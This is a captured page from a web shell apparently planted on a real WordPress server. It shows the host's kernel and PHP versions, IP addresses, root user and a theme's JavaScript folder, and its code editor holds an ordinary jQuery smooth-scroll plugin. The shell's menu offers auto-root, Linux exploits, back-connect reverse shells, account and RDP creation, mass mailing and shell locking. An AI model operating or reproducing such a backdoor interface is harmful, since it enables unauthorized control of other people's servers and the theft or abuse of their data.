Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
insepet /
wp-content /
themes /
micron /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
admin-scripts.js
7.23
KB
-rw-r--r--
controller.js
23.97
KB
-rw-r--r--
fromTo.js
914
B
-rw-r--r--
imagesloaded.pkgd.min.js
6.42
KB
-rw-r--r--
jquery.animate-colors-min.js
2.69
KB
-rw-r--r--
jquery.colorbox-min.js
10.64
KB
-rw-r--r--
jquery.contentcarousel.js
5.38
KB
-rw-r--r--
jquery.easing.min.js
5.42
KB
-rw-r--r--
jquery.easy-pie-chart.js
6.44
KB
-rw-r--r--
jquery.flexslider-min.js
20.92
KB
-rw-r--r--
jquery.inview.min.js
1.23
KB
-rw-r--r--
jquery.mobile-events.min.js
13.29
KB
-rw-r--r--
jquery.mousewheel.js
7.18
KB
-rw-r--r--
jquery.ninzio-slider-preview.j...
2.55
KB
-rw-r--r--
jquery.ninzio-slider.js
9.37
KB
-rw-r--r--
jquery.simplr.smoothscroll.js
1.26
KB
-rw-r--r--
jquery.singlePageNav.min.js
2.49
KB
-rw-r--r--
jquery.ui.totop.min.js
1.3
KB
-rw-r--r--
masonry.pkgd.min.js
24.1
KB
-rw-r--r--
media-modal.js
1.78
KB
-rw-r--r--
modernizer.js
14.27
KB
-rw-r--r--
multi-post-thumbnails-admin.js
1.89
KB
-rw-r--r--
retina-1.1.0.min.js
2.92
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : jquery.simplr.smoothscroll.js
/** * jquery.simplr.smoothscroll * version 1.0 * copyright (c) 2012 https://github.com/simov/simplr-smoothscroll * licensed under MIT * requires jquery.mousewheel - https://github.com/brandonaaron/jquery-mousewheel/ */ ;(function($) { 'use strict'; $.srSmoothscroll = function(options) { var self = $.extend({ step: 55, speed: 400, ease: "swing" }, options || {}); // private fields & init var win = $(window), doc = $(document), top = 0, step = self.step, speed = self.speed, viewport = win.height(), body = $.browser.webkit ? $('body') : $('html'), wheel = false; // events $('body').mousewheel(function(event, delta) { wheel = true; if (delta < 0) // down top = (top+viewport) >= doc.height() ? top : top+=step; else // up top = top <= 0 ? 0 : top-=step; body.stop().animate({scrollTop: top}, speed, self.ease, function () { wheel = false; }); return false; }); win .on('resize', function (e) { viewport = win.height(); }) .on('scroll', function (e) { if (!wheel) top = win.scrollTop(); }); }; })(jQuery);
Close